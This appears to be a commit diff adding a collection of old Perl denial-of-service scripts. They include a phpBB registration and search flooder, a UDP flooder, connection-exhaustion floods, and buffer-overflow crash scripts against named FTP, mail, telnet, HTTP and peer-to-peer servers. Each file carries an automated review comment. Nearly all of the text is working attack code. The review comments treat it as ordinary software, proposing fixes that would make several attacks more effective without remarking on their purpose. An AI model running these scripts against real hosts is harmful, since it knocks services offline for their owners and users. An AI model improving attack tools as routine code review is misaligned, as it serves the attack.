print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
# milw0rm.com [2005-06-22]
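Review bot: The requests the two loops build carry several fixed strings that a forum operator's log or WAF rule can key on, and the header does not call them out: `username=NsT__<n>` with `email=NsT__<n>%40neosecurityteam.net` posted to `profile.php`, `search_keywords=Neo+Security+Team+Proof+of+Concept+<n>` posted to `search.php?mode=results`, and the constant `User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; ...) Firefox/1.0.4` on both. I would add under `## Description:` a line `## Indicators: NsT__<n> usernames / @neosecurityteam.net emails, 'Neo Security Team Proof of Concept' search terms, BeOS Firefox/1.0.4 user agent`. Style: `new IO::Socket::INET (...)` is indirect-object syntax (`IO::Socket::INET->new(...)`), and `chop` on the three `<STDIN>` reads should be `chomp`.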

57
Perl/DoS.Perl.BBDoS.c Normal file

@ -0,0 +1,57 @@
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "udp flood - KaN3\n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
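Review bot: Control flow is spelled with `goto packets`/`goto randpackets` into labelled infinite loops, where a single `if`/`else` around the two `for (;;)` bodies (or one loop with a flag for the random-port case) would read plainly; the bareword socket handle `crazy` and the four-way `if` ladder on `$ARGV[1]`/`$ARGV[2]` are the same era's style. The header comment `# if arg1/2 =0, randports/continous packets.` is the only documentation of the argument semantics; `# <port> 0 = random port per packet, <time> 0 = run until killed` next to the usage line would be clearer. The file has no `use strict; use warnings;`.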

38
Perl/DoS.Perl.Chopsui Normal file

@ -0,0 +1,38 @@
#
# Argosoft Mail Server 1.0.0.2 DoS
# Chopsui-cide[MmM] 2000
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# This will cause Argosoft Mail Server 1.0.0.2 to page fault if the finger
# daemon is running.
#
use IO::Socket;
$host = "tr" ;
$port = "79";
$count = 0;
$sod = "";
$len = 3000;
while($count < $len) {
$sod .= "X";
$count += 1;
}
$sod .= "\@X";
$count = 0;
while($count < 5) {
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";
print "done.\n";
print $socket "$sod\x0a";
sleep(5);
close($socket);
$count += 1;
}
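Review bot: The 3000-iteration `while` that appends `"X"` one byte at a time is the repetition operator spelled out; `my $sod = ("X" x $len) . "\@X";` says the same thing in one line and drops the `$count` bookkeeping. `$host = "tr"` is a hard-coded placeholder value the header does not explain; a `# placeholder host` comment next to it would save the next reader a look. No `use strict; use warnings;`, and `$socket` is a package global reused across iterations.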

43
Perl/DoS.Perl.Fusion Normal file

@ -0,0 +1,43 @@
# Example for a possible DOS-attack against Byte Fusion Telnet.
# There need to be 3090 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation
# Unregistered Evaluation. See www.bytefusion.com/telnet.html
# (Machine name) Login: [more then 3090 characters]
# Overflow
use IO::Socket;
print "Possible DOS-attack against Byte Fusion Telnet\n";
print "++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[0]) {
print "Usage: $0 [host]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 3090;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "$bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)

44
Perl/DoS.Perl.Httux Normal file

@ -0,0 +1,44 @@
use IO::Socket;
#USE .
#./tuxDOS.pl www.some.com.mx 80
#TUX HTTPD Denial of Service for RedHat 7.2
#hecho por malcom-x
#cantact : malcomX@antisocial.com
#####################################################################
if(@ARGV == 2){
my $host = $ARGV[0];
my $port = $ARGV[1];
$EOL = "\015\012";
$BLANK = $EOL x 2;
#you can increment num of request in $sm change this value -> 6000 <-, for enlarge host.
$sm = A x 6000;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "$port",
Proto => 'tcp');
unless($sock){
die "jeje Not vulnerable try later.";
}
$sock->autoflush(1);
print $sock "GET / HTTP/1.0\nAccept: */*\nHost: ". $sm ."\n" .$BLANK;
while ( <$sock> ){
print;
}
close $sock;
}else{
print "[Usage]...\n./tuxDOS.pl 'HosT' [port] \n";
}
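Review bot: `$sm = A x 6000;` relies on the bareword `A` being treated as the string "A" because the file has no `use strict`; under strictures it is a compile error, so it should read `$sm = "A" x 6000;`. `PeerPort => "$port"` quotes a scalar for no reason, and the `unless ($sock) { die ... }` after `IO::Socket::INET->new` is the usual `or die "...: $!"` with the error reason attached. The `#you can increment num of request in $sm ...` comment describes a header length, not a request count; `# length of the oversized Host: header value` would be accurate.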

57
Perl/DoS.Perl.Imesh.102 Normal file

@ -0,0 +1,57 @@
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
# http://midgets.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#
use IO::Socket;
$localhost = "localhost";
$port = "5000";
# Dummy payload
$payload = "";
$c = 0;
while($c < 0x1aa) {
$payload .= "\x90";
$c += 1;
};
$payload .= "\xcc"; # raise exception 03h
$es = "";
$c = 0;
while($c < 0x2723) {
$es .= "\x90";
$c += 1;
};
$es .= "\x43\x04\x43\x00";
$c = 0;
while($c < 12) {
$es .= "\x90";
$c += 1;
};
$es .= $payload;
#print "$es";
$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket
.\n";
print "waiting for connection on port $port...";
$accsock = $lsock->accept();
print "connected.\n";
print $accsock "$es";
sleep(5);
close($accsock);
close($lsock);
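Review bot: `$accsock = $lsock->accept();` is never checked, so when accept() fails and returns undef the following `print $accsock "$es"` writes to an undefined handle while the script still reports "connected."; guard it with `my $accsock = $lsock->accept() or die "accept failed: $!";`. The die string beginning `"unable to create socket` is split across a physical line break, which puts a literal newline in the message and is presumably a paste artifact. The three `while($c < …) { $x .= "\x90" }` loops are the idiom `"\x90" x 0x1aa`, which would make the buffer layout (0x2723 NOPs, the four bytes `\x43\x04\x43\x00`, 12 NOPs, then the INT3 payload) readable at a glance; what that four-byte value is meant to overwrite is not stated anywhere in the file and deserves a comment.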

31
Perl/DoS.Perl.Meteor.a Normal file

@ -0,0 +1,31 @@
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org
use Net::FTP;
$host = $ARGV[0];
if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
$ftp->quit;
print("Success!\n");
}
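Review bot: `$ftp->login(...)` is called in void context and `print("Success!\n")` follows unconditionally, so the script prints success whether the daemon crashed, rejected the login, or simply closed the connection. Capture the result, `my $ok = $ftp->login($pad);`, and report `$ok ? "Server answered login normally\n" : "No/abnormal reply: " . $ftp->message . "\n"`, so a dropped connection is what gets flagged rather than everything. Hoisting the long `%` literal into `my $pad = "%" x $len;` would also make the overflow length visible instead of something to count by hand. `if("$ARGV[0]" eq "")` reads more clearly as `unless (defined $ARGV[0] && length $ARGV[0])`.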

29
Perl/DoS.Perl.Nertt Normal file

@ -0,0 +1,29 @@
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it's used
use strict; use Socket;
my($y,$h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) {
socket(S, AF_INET, SOCK_STREAM, $proto);
connect(S,$addr) or next;
select S;
$| = 1;
select STDOUT;
send S,"OMNIBACK HAS SOME BIG ISSUES",0;
}
print "ATTACK COMPLETED!\n";
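Review bot: `$p = 5555 if (!$ARGV[1]);` only assigns the port when no second argument is given, so when a port is supplied `$p` stays undef and `sockaddr_in($p, $in_addr)` packs port 0; the intended line is `$p = $ARGV[1] || 5555;`. The missing-hostname branch `if (!$h) { print "..."; }` prints the usage text but does not exit, so `gethostbyname('')` runs anyway and `$in_addr` is undef; add `exit 1;` inside the block. Note also that `socket(S, …)` reopens the same bareword handle on every iteration, which implicitly closes the previous connection, so at most one connection from this script is open at a time; whether that still produces the memory growth the header describes is not something the file shows.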


@ -0,0 +1,34 @@
#####################################################
# Proxomitron - Universial Web Filter - Version 3 #
# Dos Attack. #
#####################################################
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=2) {
print "\n-->";
print "\tUsage: perl dos-prox.pl <host> <port>\n";
exit;
}
$vic = $ARGV[0]; # There IP
$Uport = $ARGV[1]; # There Web Port
$SendStr = "GET /" x 1000; # Crash String
print "\n-->";
print "\tCrashing:$vic on:$Uport\n";
unless ($socket2 = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $vic,
PeerPort => $Uport))
{
print "-->";
print "\tConnection Failed, Stoping.\n";
exit;
}
print $socket2 "GET $SendStr\n";
close $socket2;
print "-->";
print "\tCrashed:$vic\n";
exit;
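Review bot: The final `print "\tCrashed:$vic\n";` is unconditional — one line has been written and the socket closed, and nothing verifies the target stopped responding, so the output is misleading on a patched host; a reconnect probe after the send, as the vftp script in this commit does, would turn the message into an actual check. The send line `print $socket2 "GET $SendStr\n";` also prefixes `$SendStr`, which is already `"GET /" x 1000`, with a second `GET `, so the request starts `GET GET /GET /…`; if the repeated-method string is the trigger, `print $socket2 "$SendStr\n";` is presumably what was meant and a comment should say so. `Proto => "TCP"` relies on getprotobyname() accepting the upper-case name, which is not guaranteed everywhere; use `"tcp"` as the other scripts in this commit do. The comments `# There IP` / `# There Web Port` should read `Their`.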

79
Perl/DoS.Perl.Raden Normal file

@ -0,0 +1,79 @@
Who has more free file descriptors & network ports, you or the ftp server ?
ftpd's which limit connections to 1 per user@host or similar may have some
defense against this, or if they don't support multiple data connections
open at the same time. I suspect "many" is the number of ftpd's which are
vulnderable to this attack so I've made no attempt (except in one case) to
contact vendors because there are just too many damn vendors, not to mention
ftpd's! But basically, if the other end has, on average, maximum fd limit
at 63, allows 50 connections, that's 3000 open fd's. I'm not sure how many
ftpd's are setup with that many open files as a part of the sytem, but not
many, I suspect.
No apologies for using perl(5), I just wanted a quick prototype. It's not
perfect but then I did't want to spend too much time on this.
to ftpd maintainers:
I don't know of any ftp clients which make use of this feature (multiple
data channels supported concurrently) as the original ftp clients were all
line-based and only suported one transfer at a time. Maybe this is
reasonable, but it would be a shame for the default defense to this attack
to mean you can't use FTP to it's full potential (i.e. start a transfer
from the current session but keep using the current `login' session, maybe
to start other transfers, as requried). Triming the number of concurrent
data sessions to a maximum of 1-5 (by default) would probably be enough,
with the capability to set this higher/lower as required.
Darren
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);
if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}
while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
print $sock "PASV\r\n" if (/^230 .*/);
if (/^227 .*/) {
$remote = $_;
$remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;
@bits = split(/,/, $remote);
if ($#bits eq 5) {
$remport = $bits[4] * 256 + $bits[5];
$#bits = 3;
$remip = join('.', @bits);
$foo[$num++] = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $remip,
PeerPort => "($remport)");
}
print $sock "PASV\r\n";
}
last if (/^530 .*/);
}
waitpid -1,0;
}
sleep(5);
}
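Review bot: When the control connection fails, `if (!$sock) { print "connect failed!\n"; waitpid -1,0; }` does not leave the loop body, so execution falls into `while (<$sock>)` with `$sock` undefined; add `next;` (or `exit`) after the waitpid. `if ($#bits eq 5)` compares the last array index as a string; it happens to work but `==` is the operator a reader expects. `fork` is never checked for undef, so a failed fork silently ends the inner loop instead of being reported. The advisory prose at the top of the file is not commented out, so as committed the file is not valid Perl until that text is prefixed with `#` or moved out; and `$DOS_HOST="localhost"` means the script targets the machine it runs on unless edited.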

57
Perl/DoS.Perl.Shafolder Normal file

@ -0,0 +1,57 @@
#
#Kazaa/Morpheus Denial of Service Attack
#Coded by Paul Godfrey
#PaulG@Crackdealer.com
#
#Problem: Both Kazaa and Morpheus filesharing applications have "backdoors"
#which allow anonymous file access to their shared folder. What does this have
#to do with Denial of Service? Unlike connections made from other users
#of the applications, the number of connections to the backdoor cannot be
#regulated or detected by the client. This obviously will allow us to flood the
#server with requests and therefore use up all of the available bandwidth.
#Also due to the fact that most users have setup their firewall privileges so
#that Kazaa or Morpheus is allowed access to open connections to outside sources
#this attack will bypass most personal firewall clients such as Zone Alarm.
#
#Enjoy.
#
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");
$trash="A"x100;
&exec_cmd($command);
sub exec_cmd {
for($count=1;$count<=1000;$count++)
{
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(< S >){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
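Review bot: `while(< S >){ … }` does not read from the socket — with whitespace inside the angle brackets Perl treats `< S >` as a glob of the string ` S `, so the response is never consumed and `@in` is always empty; the readline form is `while (<S>) { push @in, $_; }`. `&exec_cmd($command);` passes a `$command` that is never assigned anywhere in the file, and `exec_cmd` ignores its arguments, so the parameter is dead. `connect(S, pack "SnA4x8", 2, 1214, $target)` hand-packs a sockaddr_in (family 2 = AF_INET, port 1214) where `connect(S, sockaddr_in(1214, $target))` from the already-loaded Socket module does the same portably. `$args{X}` is tested for the progress dots but the getopts spec is only `"h:"`, so it can never be set.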

49
Perl/DoS.Perl.Small.a Normal file

@ -0,0 +1,49 @@
# **************************************************************
# DoS for Linux kernels from 2.2.7 to 2.2.9 reported in BUGTRAQ
# 06/01/99 by Piotr Wilkin <pwl@wotan.2slo.wav.pl>
# An attacker has to be in same ethernet segment with victim
# I did't test it
# coded by misteri0 from P.A.T.C.H.
# Requires Net-RawIP-0.09 included in this directory
# Edited for use with toast by Gridmark
# **************************************************************
$| = 1;
require 'getopts.pl';
use Net::RawIP;
Getopts('t:');
die " misteri0\@unet from P.A.T.C.H.\n Usage $0 -t <target>" unless
$opt_t;
srand(time);
$i = 996;
$data .= chr(int rand(255)),$i-- while($i);
$icmp = new Net::RawIP({
ip => {
ihl => 6,
tot_len => 1024,
id => 1,
ttl => 255,
frag_off => 0,
daddr => $opt_t
},
icmp => {
id => 2650,
data => $data
}
});
$j++;
$icmp->set({
ip => { saddr => 17000000 + int rand 4261000000 },
icmp => {
type => int rand(14),
code => int rand(10),
sequence => int rand(255)
}
});
$icmp->send;
print "Linux-DoS sent...\n"
# print "[b00m] " unless $j%1000;
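Review bot: Only one packet is ever sent: `$j++` and the commented-out `print "[b00m] " unless $j%1000;` read like the remains of a loop around the `$icmp->set(...)`/`$icmp->send` pair, but no loop exists, so the randomised source address, type, code and sequence are drawn exactly once. If a single packet is the intent, the header should say so and `$j` can go; otherwise wrap the set/send pair in `while (1) { … }`. `require 'getopts.pl'` is the Perl 4 library, which current perls no longer ship; `use Getopt::Std; getopts('t:');` yields the same `$opt_t`. `$data .= chr(int rand(255)),$i-- while($i);` relies on the comma operator inside a statement modifier and is clearer as `my $data = join '', map { chr(int rand 255) } 1 .. 996;`. `ihl => 6` declares a 24-byte IP header although no options are supplied — presumably deliberate for this bug, but it deserves a comment.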

240
Perl/DoS.Perl.Tedla Normal file

@ -0,0 +1,240 @@
#####################################################################
# Rewted Network Security Labs - www.rewted.org #
# based upon advisories by USSR (www.ussrback.com) & Rewted.org #
# #
# Demonstration script to remotely overflow various server buffers, #
# resulting in a denial of service, for TESTING purposes only. #
# Runs on *nix & Windows with perl. #
# #
# G6 FTP Server v2.0 beta4/5 #
# MDaemon httpd Server v2.8.5.0 #
# Avirt Mail Server v3.5 #
# BisonWare FTP Server v3.5 #
# Vermillion FTP Server v1.23 #
# ZetaMail POP3 Server v2.1 #
# WFTPD FTP Server 2.40 #
# BFTelnet Server v1.1 #
# Broker FTP Server v3.5 #
# ExpressFS FTP server v2.x #
# XtraMail POP3 Server v1.11 #
# Cmail SMTP Server v2.4 #
# PakMail SMTP/POP3 v1.25 #
# #
# slackette - warminx@null.rewted.org #
# www.rewted.org www.rewted.org www.rewted.org www.rewted.org #
#####################################################################
use IO::Socket;
use Getopt::Std;
getopts('h:p:t:u:v', \%args);
if(!defined($args{h}) && !defined($args{t})) {
print qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v
-h victim to test remote overflow DoS on
-t server type (check the -v option for list)
-u username authorisation (required if server prompts for username)
-p password authentication (required if user/passwd is expected)
-v lists all servers vulnerable to each DoS
~; exit; }
if(defined($args{u})) { $user=$args{u}; }
if(defined($args{p})) { $pass=$args{p}; }
if(defined($args{v})) { &vulnerable; }
if(defined($args{h}) && defined($args{t})){
if(($args{t}) == 1) { &G6; }
if(($args{t}) == 2) { &mdaemon; }
if(($args{t}) == 3) { &avirt; }
if(($args{t}) == 4) { &bisonware; }
if(($args{t}) == 5) { &vermillion; }
if(($args{t}) == 6) { &zetamail; }
if(($args{t}) == 7) { &wftpd; }
if(($args{t}) == 8) { &bftelnet; }
if(($args{t}) == 9) { &broker; }
if(($args{t}) == 10) { &expressfs; }
if(($args{t}) == 11) { &xtramail; }
if(($args{t}) == 12) { &cmail; }
if(($args{t}) == 13) { &pakmail; }
if(($args{t}) == 14) { &pakpop; }}
sub G6 {
$denial .= "A" x 2000;
$victim=$args{h};
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
$socket->autoflush(1);
print $socket "$denial\n"; # user
print "\nSent overflow to $victim\n";
close $socket; }
sub mdaemon {
$victim=$args{h};
$denial .= "A" x 1025;
$url = "/$denial";
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "80") or die "Can't connect.\n";
print $socket "GET $url\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub avirt {
$victim=$args{h};
$denial .= "A" x 856;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "user $user\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bisonware {
$victim=$args{h};
$denial .= "A" x 2000;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vermillion {
$victim=$args{h};
$denial .= "A" x 504;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$user\n";
print $socket "$pass\n";
print $socket "cwd $denial\n";
# for(i=0; i<=3; i++) { print $socket "CWD $denial\n"; }
print "\nSent overflow to $victim\n";
close $socket; }
sub zetamail {
$victim=$args{h};
$denial .= "A" x 3500;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user $denial\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub wftpd {
$victim=$args{h};
$denial .= "A" x 255;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$user\n";
print $socket "$pass\n";
print $socket "MKDIR $denial\n";
print $socket "CWD $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bftelnet {
# use Net::Telnet;
$victim=$args{h};
$denial .= "A" x 3090;
$telnet = new Net::Telnet ( Timeout =>10,
Errmode =>'die');
$telnet->open('$victim');
$telnet->waitfor('/Login: $/i');
$telnet->print('$denial');
print "\nSent overflow to $victim\n";
close $telnet; }
sub broker {
$victim=$args{h};
$denial .= "A" x 2730;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub expressfs {
$victim=$args{h};
$denial .= "A" x 654;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print $socket "AAAAAAAAAAAAAAAAAAA\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub xtramail {
$victim=$args{h};
$denial .= "A" x 2930;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub cmail {
$victim=$args{h};
$denial .= "A" x 7090;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakmail {
$victim=$args{h};
$denial .= "A" x 1390;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakpop {
$victim=$args{h};
$denial .= "A" x 1400;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user test\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vulnerable {
print qq~
______________________________________________________________________________
Vulnerable Daemon Version Vulnerable Daemon Version
______________________________________________________________________________
[1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0
[3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5
[5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1
[7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1
[9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x
[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4
[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25
~; exit; }
